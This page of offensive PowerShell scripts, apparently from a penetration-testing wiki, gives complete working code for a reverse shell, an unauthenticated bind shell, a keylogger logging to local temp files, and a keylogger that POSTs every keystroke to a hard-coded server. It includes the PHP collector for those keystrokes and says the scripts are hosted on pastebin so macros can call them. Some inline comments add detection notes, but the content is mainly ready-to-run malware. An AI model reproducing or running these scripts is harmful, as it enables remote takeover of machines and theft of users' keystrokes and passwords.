Useful Scripts
Powershell
These scripts are also stored at [http://pastebin.com/u/powershell] so they can be called from macros.
Reverse Shell (update address and port before using)
# Reverse shell, written as a single statement run: ReverseShellClean is the cleanup helper
# (closes the TcpClient and the cmd.exe process, then exits the host); the rest opens an
# outbound TcpClient to $address:$port (hard-coded to 127.0.0.1 / 12345 below), starts
# cmd.exe with stdin/stdout redirected, and relays ASCII text between the socket and
# cmd.exe. Each loop pass reads from the socket until a newline (byte 10) is seen or the
# buffer is full, writes that text to cmd.exe stdin, then sends whatever output is pending;
# a zero-byte read falls into the else branch and calls ReverseShellClean.
# Detection note: powershell.exe spawning cmd.exe with redirected standard handles while the
# PowerShell host holds an outbound TCP connection; the channel is plaintext ASCII.
function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()};if ($process.ExitCode -ne $null) {$process.Close()}; exit; } $address = '127.0.0.1'; $port = '12345'; $client = New-Object system.net.sockets.tcpclient; $client.connect($address,$port) ; $stream = $client.GetStream(); $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize ; $process = New-Object System.Diagnostics.Process ; $process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' ; $process.StartInfo.RedirectStandardInput = 1 ; $process.StartInfo.RedirectStandardOutput = 1; $process.StartInfo.UseShellExecute = 0 ; $process.Start() ; $inputstream = $process.StandardInput ; $outputstream = $process.StandardOutput ; Start-Sleep 1 ; $encoding = new-object System.Text.AsciiEncoding ; while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}; $stream.Write($encoding.GetBytes($out),0,$out.Length) ; $out = $null; $done = $false; $testing = 0; while (-not $done) {if ($client.Connected -ne $true) {cleanup} ; $pos = 0; $i = 1; while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos); $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} ; if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos); $inputstream.write($string); start-sleep 1; if ($process.ExitCode -ne $null) {ReverseShellClean}; else { $out = $encoding.GetString($outputstream.Read()); while($outputstream.Peek() -ne -1){; $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}; $stream.Write($encoding.GetBytes($out),0,$out.length); $out = $null; $string = $null}; } else {ReverseShellClean}};
Bind shell
# Bind shell: listens on TCP $port on every interface, accepts a single client, starts
# cmd.exe with stdin/stdout redirected, and relays ASCII text between the socket and
# cmd.exe. There is no authentication and no encryption; the session ends when a socket
# read returns zero bytes.
# Detection note: a listening socket owned by the PowerShell host plus a cmd.exe child
# with redirected standard handles.
function BindShell {
# Listener port is hard-coded.
$port = "12345"
$encoding = new-object System.Text.AsciiEncoding
# Binds to IPAddress.Any, i.e. reachable on any interface of the host.
$endpoint = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, $port)
$listener = new-object System.Net.Sockets.TcpListener $endpoint
$listener.start()
# Blocks until one client connects; no further clients are accepted.
$socket = $listener.AcceptTcpClient()
$networkstream = $socket.GetStream()
$networkbuffer = New-Object System.Byte[] $socket.ReceiveBufferSize
# cmd.exe runs as a child of the PowerShell host with both standard streams redirected.
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe"
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
# Initial drain: whatever cmd.exe printed in its first second is sent to the client.
Start-Sleep 1
while($outputstream.Peek() -ne -1){
$string += $encoding.GetString($outputstream.Read())
}
$networkstream.Write($encoding.GetBytes($string),0,$string.Length)
$string = ''
$done = $false
while (-not $done) {
# Read from the socket until a newline (byte 10) is present or the buffer is full.
# $i is never modified, so the inner loop exits only via break or a full buffer.
$pos = 0
$i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $networkstream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read
if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {
break
}
}
# Data received: forward it to cmd.exe stdin and relay the pending output back.
# Zero bytes received (peer closed): leave the loop and return from the function.
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
# Write Output
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read())
}
$networkstream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
}
else {$done = $true}
}
}
# Starts the listener immediately when this text is run; the call blocks in AcceptTcpClient until a peer connects.
bindshell
Keylogger to local files
# Keylogger (local files): every 40 ms polls virtual-key codes 1..254 with GetAsyncKeyState,
# converts a newly pressed key to text with ToUnicode, and appends it under %TEMP%.
# The outer loop is while ($true); there is no stop condition.
# Detection note: Add-Type compiling user32.dll P/Invoke stubs (GetAsyncKeyState,
# GetKeyboardState, MapVirtualKey, ToUnicode) into namespace Win32Functions at runtime,
# and files named "audit" and "Logging" growing in the user's %TEMP%.
function KeyLog {
# MapVirtualKey mapping-type constants; only $MAPVK_VSC_TO_VK_EX is used below.
$MAPVK_VK_TO_VSC = 0x00
$MAPVK_VSC_TO_VK = 0x01
$MAPVK_VK_TO_CHAR = 0x02
$MAPVK_VSC_TO_VK_EX = 0x03
$MAPVK_VK_TO_VSC_EX = 0x04
# C# P/Invoke signatures (here-strings) compiled by the Add-Type calls further down.
$virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
$kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@
$mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@
$tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[]
lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
# Each Add-Type returns the generated static type; the names below are its static methods.
$getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
$getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
$getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
$getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
while ($true) {
Start-Sleep -Milliseconds 40
$gotit = ""
for ($char = 1; $char -le 254; $char++)
{$vkey = $char
# -32767 is 0x8001 as a signed short: GetAsyncKeyState reports the key as down and as
# pressed since the previous query.
$gotit = $getKeyState::GetAsyncKeyState($vkey)
if ($gotit -eq -32767)
{$l_shift = $getKeyState::GetAsyncKeyState(160)
# Shift and CapsLock state are read here but not referenced again in this function.
$r_shift = $getKeyState::GetAsyncKeyState(161)
$caps_lock = [console]::CapsLock
$scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
# 256-byte keyboard state snapshot passed to ToUnicode so modifiers are applied.
$kbstate = New-Object Byte[] 256
$checkkbstate = $getKBState::GetKeyboardState($kbstate)
$mychar = New-Object -TypeName "System.Text.StringBuilder";
$unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
if ($unicode_res -gt 0)
{
# A positive result means characters were produced; they are appended to %TEMP%\audit,
# then %TEMP%\Logging is read, joined with newlines and written back to itself.
$keys = $mychar.ToString()
$temp = "$env:temp\audit"
$logfile = "$env:temp\Logging"
add-content $temp $keys
$text = [string]::Join("`n", (Get-Content $logfile))
Write-Output $text > $logfile
}}}}}
# Starts polling immediately; KeyLog never returns on its own.
KeyLog
Keylogger to HTTP Post
# PHP Code for logging of keys
# FYI - need to create a keylogs folder for php script to write to
#
# <?php
# $saving = $_REQUEST['saving'];
# if ($saving == "1"){
# $data = $_POST['data'];
# $file = $_POST['filename'];
#
# $fp = fopen("keylogs/".$file, "a") or die("Couldn't open $file for writing!");
# fwrite($fp, $data) or die("Couldn't write values to file!");
# fclose($fp);
# }
# ?>
# Keylogger (HTTP POST): same polling and ToUnicode decoding as the local-file version, but
# each captured key is sent as a form-encoded POST to a hard-coded plaintext HTTP URL using
# the Msxml2.XMLHTTP COM object. This redefines KeyLog; in one session it replaces the
# local-file version above. The outer loop is while ($true); there is no stop condition.
# Detection note: Add-Type compiling user32.dll P/Invoke stubs into namespace Win32Functions,
# a PowerShell host instantiating Msxml2.XMLHTTP, and one outbound POST per keystroke to
# a .../PostKeys.php path over unencrypted HTTP.
function KeyLog {
# MapVirtualKey mapping-type constants; only $MAPVK_VSC_TO_VK_EX is used below.
$MAPVK_VK_TO_VSC = 0x00
$MAPVK_VSC_TO_VK = 0x01
$MAPVK_VK_TO_CHAR = 0x02
$MAPVK_VSC_TO_VK_EX = 0x03
$MAPVK_VK_TO_VSC_EX = 0x04
# C# P/Invoke signatures (here-strings) compiled by the Add-Type calls further down.
$virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
$kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@
$mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@
$tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[]
lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
# Each Add-Type returns the generated static type; the names below are its static methods.
$getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
$getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
$getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
$getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
while ($true) {
Start-Sleep -Milliseconds 40
$gotit = ""
for ($char = 1; $char -le 254; $char++)
{$vkey = $char
# -32767 is 0x8001 as a signed short: GetAsyncKeyState reports the key as down and as
# pressed since the previous query.
$gotit = $getKeyState::GetAsyncKeyState($vkey)
if ($gotit -eq -32767)
{$l_shift = $getKeyState::GetAsyncKeyState(160)
# Shift and CapsLock state are read here but not referenced again in this function.
$r_shift = $getKeyState::GetAsyncKeyState(161)
$caps_lock = [console]::CapsLock
$scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
# 256-byte keyboard state snapshot passed to ToUnicode so modifiers are applied.
$kbstate = New-Object Byte[] 256
$checkkbstate = $getKBState::GetKeyboardState($kbstate)
$mychar = New-Object -TypeName "System.Text.StringBuilder";
$unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
if ($unicode_res -gt 0)
{$keydate = get-date -format yyyyMMdd
# Remote file name is built from the machine name and the date; it is sent as the
# 'filename' form field, so the server side decides how (or whether) to constrain it.
$logfile = "$env:computername-$keydate-keys.txt"
# Hard-coded endpoint; the request body is a plain application/x-www-form-urlencoded string.
$url = "http://myserver/storage/PostKeys.php"
$parameters = "saving=1&data=$keys&filename=$logfile"
$keys = $mychar.ToString()
# Synchronous POST ($false = not async) via the Msxml2.XMLHTTP COM object.
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open('POST', $url, $false)
$http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length)
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
}}}}}
# Starts polling immediately; KeyLog never returns on its own.
KeyLog